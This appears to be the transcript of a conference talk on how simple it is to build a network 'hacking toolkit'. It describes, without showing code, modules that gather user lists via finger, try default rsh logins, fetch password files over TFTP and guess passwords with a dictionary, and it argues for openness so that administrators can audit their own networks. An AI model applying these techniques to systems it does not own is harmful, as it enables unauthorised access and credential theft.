Are we sitting comfortably?
Then I shall begin.
A few months ago, I was watching some consumer-information type programme on T.V - Here And Now, Watchdog - something like that.
The main item on the program was an expose' on confidence trickery - specifically in the hundreds of cases of old-age pensioners (senior citizens, crumblies - call them what you will) who were being approached in their homes by thugs who would demand money from them for work that had never been solicited, or on behalf of the local council, or gas board or water board, and so on...
I was shocked. Appalled. Aghast, even.
How could the BBC be so utterly irresponsible, I wondered?
How could their programmes editor be so completely thoughtless as to air a program like this, which would certainly plant the idea of similar shenanigans in the minds of Britain's youth.
Thousands, perhaps millions of adolescents with a desire to make fast cash might have seen that program and then gone out and done the same for themselves, preying on the weaknesses of our most vulnerable members of society.
[START RANTING]
From this premise, it seems obvious to me that we need much tighter control on the media, to prevent further instances of this occuring - where today's youth will be corrupted by ideas fed to them through mainstream communications media and, thereby turn against society, with increasing crime rates and greater costs for law enforcement, causing higher taxes...
[DRAMATIC PAUSE]
Of course, this is all bullshit.
Yes, it's true that I saw such a program, and yes, I was shocked.
However what I was shocked by was that it was occuring - even that this sort of crime could occur at all. Through my own naievity, perhaps, I hadn't thought of this as a possible problem which could impact people I know and love.
The concept had never crossed my peaceful and generally law-abiding nice-guy-if-a-bit-daft, mind. Now that I felt informed about the situation at least to some extent, I could take at least some steps to try to ensure that the problem was unlikely to occur amongst my circle of relatives.
However... on the other hand, the sort of kneejerk reactions that I tried to outline, earlier, are all too common in the communications industries.
For those of you who've witnessed them, think back to arguments you've seen regarding topics like encryption, network auditing tools, host auditing tools, www software like java or netscape cookies (an interesting topic in itself) - double edged software which equally be put to good, bad, or stupid (naive) use - and usually all of the debates will include at least a few hype-driven threads along the lines of:
As you may have guessed from my take on the issue, I believe that in many such situations that there is generally a greater benefit in informing the populace in some constructive manner, than there is in promoting ignorance and locking it down via authoritarian controls.
Such is the way of debate over Internet security vulnerabilites; I have almost given up reading newspapers and trade-rags due to the high proportion of quite ludicrous fantasy that one encounters nowadays, especially when (from the vantage point of experience) it is easy to see when a story has been shoehorned into the press to fit someone's political or commercial agenda.
So, it is in an attempt to redress the media's swamping of the press with stories of elite hacqerz ("some as young as 12 years old!") with arcane skills which defy mortal imagination, I have prepared this little one-day programming course in "How to Build a Hacking Toolkit".
At the end of it, I hope you'll agree, that many of the basic skills of hacking are quite as easy as knocking on doors and browbeating little old ladies out of their pension money.
For those of you who may suffer wit-impairment of some form, please note that I do not condone either of the activities of extorting money from the elderly, nor of hacking into other people's machines - but I do feel strongly that there is a overall benefit in shining a light on hacking methods.
Before I begin, though, I suppose that I had better say a thing or two about plumbing.
I won't pretend that everyone in this room has been exposed to computer programming in general or to operating systems like Unix in particular, so instead of just whipping slides of programs on and off the OHP without any of the magic sinking in, I thought that I'd best explain what's going on.
Consider a plumbing system - a source of waste water which them passes though a variety of pipes and appliances on it's way to the sewage outlet.
First the water passes into the sink, drains into the sewer, then reaches a filtration plant which processes it in a variety of ways:
The point to emphasise here is the modularity of the process; a well defined flow of "stuff" starts in one place and is piped through a variety of processes which do something useful, before the "stuff" is finally dumped.
Similarly perhaps to a network auditing (or, if you prefer, network breaking) program:
Where you start with a list of computers (or "hosts") which are attached to the network.
Again, the "stuff" is piped through a variety of processes - of removing unnecessary information, of checking that we are able to reach each host that is listed. Then, the list is passed through an "attack engine" which processes it in a variety of ways:
Finally, the files that are created may be examined either automatically or by a human, looking for keys - indications of weakness - which have been detected by the attack engine, and which which may be collated to make a list of weak machines.
I hope that doesn't look too technical for people to follow. 8-)
What I've outlined is basically a strategy - a fairly commonsense strategy at that - for detecting machines that are attached to a network and which suffer weak security.
What surprises most people is how easily this strategy can be converted into a working tool that matches the expectations of this design.
To illustrate this, I have written ITOD - a network breaking tool written with five aims in mind. ITOD is meant to:
[HOSTS]
# loopback 127.0.0.1 localhost # servers 10.1.1.1 crypto loghost 10.1.1.2 foo 10.1.1.3 bar 10.1.1.4 baz 10.1.1.5 wibble 10.1.1.9 thud thud-slip # cartoon cluster 10.1.2.9 bugs 10.1.2.11 daffy 10.1.2.12 taz 10.1.2.14 elmer 10.1.2.15 porky 10.1.2.16 droopy2 10.1.2.18 speedy
Here we have a plausible looking list of 14 machines that are attached to a network - such information must be generally available in order for computers to communicate with each other, and here we see a list of network addresses, each with one or more names - hostnames - attached.
Working from this, we can immediately cast an impression of what our overall tool should look like, and (by using a couple of utilities that are standard with the Unix operating system) - we can even start implementing some of it:
...don't be put off at first glance; this the code for our hacking program in it's entirety. One page of text. The first half of the program can be safely ignored when gaining an rough understanding of the program: [COVER TOP SECTION] - being as it merely deals with setting up a few bits of data that we'll need later, but don't have to bother with now.
This leaves 8 lines of code.
The first section merely sets up a directory - a folder - a repository in which we shall store the information that we glean:
Having thus implemented the general concept of the tool - how the data flows through it, and what tasks each of the modules of the tool should perform, we're now stuck with the matter of following though this outermost shell of design by implementing the modules themselves.
The first module - called itod-ping
- is trivial to analyse and it's contents will be familiar to anyone with a basic knowledge of Unix; if you're not familiar, the logic is simple and follows a commonsense approach to the module's specification:
Now - before going on - I must agree that yes, to some people (perhaps journalists especially) all this looks mystical or incomprehensible, and that therefore we should venerate people capable of writing it - but I must assure you that it's not magical in any way.
The software that you see here would have run mostly unchanged on any unix computer of 10, perhaps 15 years ago, and the language that these programs are written in dates back to 1970.
This is all college-level stuff, and is no more magical than Pitman's shorthand.
Returning to our flowchart, the remaining addresses of "live" machines on the net are passed downstream to:
The hacking engine - itod-engine - the sewage plant of our analogy, which is the last remaining bit of any complexity. Similar to the previous program, this module -
So now we have the complete picture - stuff (a list of hostnames) is stripped of non-essential information and fed into one program (which filters out dead machines) and is further fed into another program, which launches an army of weenie little attacker programs against the host, gathering information, which is then stored in files indexed by the address of the machine.
We have not yet addressed the question of "What are these attacks?" - but I should like to defer that question for awhile, and to ask the audience to think like criminals for a moment.
Imagine that you too want to cheat OAPs out of their pension. If you were intent on this crime, how would you approach it?
[ITOD-FINGER] - gathers a list of people connected to $host
[ITOD-RSH] - tries to log in as half a dozen standard usernames.
[ITOD-TFTP] - tries to retrieve the system password file - this should be impossible but for human error, but then again, if human error occurs, given a large enough sample, you're bound to be successful eventually
[ITOD-SENDMAIL] - logs the version number of the mail daemon [EXPLAIN] (notorious for bugs) and also whether a human being actually bothers to monitor e-mail sent to the system administrator.
- and so forth. The parallels are very close, and I leave it up to you to discover more, if you're interested.
The matter is worsened by the fact that computers are extremely dumb. Senile, even. Most vendors do not bother to write software which will detect that a hundred people have been knocking on the door with false identities in an attempt to get in - successfully or otherwise. That sort of thing is hard, and moreover has its own faults.
However, perhaps the most interesting thing about most of these attacks is that they are exemplified by unauthorised use of legitimate computer network services. Just as telephones can be used to make both 999/911 and nuisance phone calls, most of the services that provide information to legitimate users of a computer can be subverted in "bad" ways.
The "finger" program tells you if your friends/colleagues are logged in. It could also tell hackers what usernames/passwords to attack.
The "rsh" or "telnet" programs allow users to log into your computer remotely. If someone can spoof their identity adequately to fool the target's software - and this is trivial to do - then they can be used to subvert your machine.
Your web browser stores your e-mail address for use when composing e-mail. It could also pass that e-mail address to a marketing company to send you junk e-mail advertising, targeted around the products you were browsing.
The FTP program is the standard way of moving files around the internet. If misconfigured, it could provide information that would let someone break into your system. If a hacker tries long enough, he will eventually discover a misconfigured system.
And finally, I suppose, if all the other basic misconfigurations fail, you could always try the Ali-Baba approach and try to guess someone else's password, using another technique which is less terrifying in retrospect - password guessing.
The basic technique is simple; get a dictionary that contains a few hundred thousand words, and then - for each word - see whether the any of the users on the system used the word as their password. It's so simple, it's dumb.
Moreover, it can be implemented with a small program:
I make no apologies for this one slide - it's purposely condensed.
This is, to my knowledge, the world's smallest fully-functional password cracking program, and I speak with some authority on this matter, being also the author of the world's largest password cracking program.
For the fun of it, I spent a lot of effort into squeezing an entire password cracker into as few characters as possible, and the best effort I've made so far is a slightly condensed version of this one, and is only 72 characters long. Accurate typists could have it typed in and running from scratch in under 10 seconds.
If size is a measurement of simplicity, and if the concepts can be described in such a "it's so obvious" commonsense manner, well, then looking not merely at this tiny password cracking program, but at this whole ITOD network-breaking suite (the 85 lines of code that I have shown you today) - software which is quite capable of sweeping a medium sized network and finding pointers to several holes....
...it just seems so ridiculous that some people think that they can prevent self-motivated others from working this sort of stuff out for themselves, and that we should avoid discussion of security problems for fear of encouraging others into the paths of naughtiness.
Of course, I dare not add a postscript to this presentation; certainly there are security holes out there, the causes of which are far from obvious to ordinary mortals, and there are bugs which rely upon subtle manipulation of arcane computer programs with microsecond accuracy...
but, in my experience, they're not the worst of it, and so long as their causes are discussed openly, and so long as they get fixed eventually, I don't worry about them.
The worst comes from human error on a small scale, being gathered together in extreme density and with global accessability - and unfortunately that's precisely what the internet was designed to do.
So, where does this leave us, after this little lesson?
Certainly I hope that those of you who were worried about this terrifying threat of "hackers" with "arcane knowledge" now feel that it is a little less distant; those who are systems administrators may wish to re-examine their networks and implement something similar to what you've seen here, today, and go check your own systems.
Anyone here who thinks that the Internet is controllable - indeed, that people on the Internet are controllable - I hope that I've illuminated your minds a little. "Hacking" need be little more that knocking on doors and rattling doorknobs, until you find one that's open. I recommend that you switch your affections from control to accountability which is a far more likely proposition - even with the proviso that digital data is infinitely fungible and (often) easily forged.
Thank you very much [etc]. Are there any questions?
![[SEWAGE]](gfx/flow1.gif){kind=link}
![[FLOWCHART]](gfx/flow2.gif){kind=link}